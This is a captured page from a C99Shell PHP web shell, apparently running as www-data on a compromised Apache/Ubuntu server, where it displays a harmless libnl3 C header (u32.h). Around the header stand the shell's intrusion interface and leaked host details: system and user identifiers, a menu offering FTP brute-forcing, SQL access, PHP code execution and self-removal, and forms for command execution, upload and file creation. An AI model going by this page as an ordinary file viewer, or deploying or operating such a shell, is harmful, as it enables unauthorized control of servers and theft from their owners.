!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/include/libnl3/netlink/route/cls/   drwxr-xr-x
Free 13.06 GB of 57.97 GB (22.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     u32.h (2.17 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*
 * netlink/route/cls/u32.h    u32 classifier
 *
 *    This library is free software; you can redistribute it and/or
 *    modify it under the terms of the GNU Lesser General Public
 *    License as published by the Free Software Foundation version 2.1
 *    of the License.
 *
 * Copyright (c) 2003-2006 Thomas Graf <tgraf@suug.ch>
 */

#ifndef NETLINK_U32_H_
#define NETLINK_U32_H_

#include <netlink/netlink.h>
#include <netlink/cache.h>
#include <netlink/route/classifier.h>
#include <netlink/route/action.h>

#ifdef __cplusplus
extern "C" {
#endif

extern void    rtnl_u32_set_handle(struct rtnl_cls *, int, int, int);
extern int    rtnl_u32_set_classid(struct rtnl_cls *, uint32_t);
extern int    rtnl_u32_get_classid(struct rtnl_cls *, uint32_t *);
extern int    rtnl_u32_set_divisor(struct rtnl_cls *, uint32_t);
extern int    rtnl_u32_set_link(struct rtnl_cls *, uint32_t);
extern int    rtnl_u32_set_hashtable(struct rtnl_cls *, uint32_t);
extern int    rtnl_u32_set_hashmask(struct rtnl_cls *, uint32_t, uint32_t);
extern int    rtnl_u32_set_selector(struct rtnl_cls *, int, uint32_t, char, uint16_t, char);
extern int    rtnl_u32_set_cls_terminal(struct rtnl_cls *);

extern int    rtnl_u32_set_flags(struct rtnl_cls *, int);
extern int    rtnl_u32_add_mark(struct rtnl_cls *, uint32_t, uint32_t);
extern int    rtnl_u32_del_mark(struct rtnl_cls *);
extern int    rtnl_u32_add_key(struct rtnl_cls *, uint32_t, uint32_t,
                 int, int);
extern int    rtnl_u32_get_key(struct rtnl_cls *, uint8_t, uint32_t *, uint32_t *,
                 int *, int *);
extern int    rtnl_u32_add_key_uint8(struct rtnl_cls *, uint8_t, uint8_t,
                       int, int);
extern int    rtnl_u32_add_key_uint16(struct rtnl_cls *, uint16_t, uint16_t,
                    int, int);
extern int    rtnl_u32_add_key_uint32(struct rtnl_cls *, uint32_t, uint32_t,
                    int, int);
extern int    rtnl_u32_add_key_in_addr(struct rtnl_cls *, const struct in_addr *,
                     uint8_t, int, int);
extern int    rtnl_u32_add_key_in6_addr(struct rtnl_cls *, const struct in6_addr *,
                      uint8_t, int, int);
extern int    rtnl_u32_add_action(struct rtnl_cls *, struct rtnl_act *);
extern int    rtnl_u32_del_action(struct rtnl_cls *, struct rtnl_act *);
extern struct rtnl_act* rtnl_u32_get_action(struct rtnl_cls *);

#ifdef __cplusplus
}
#endif

#endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0057 ]--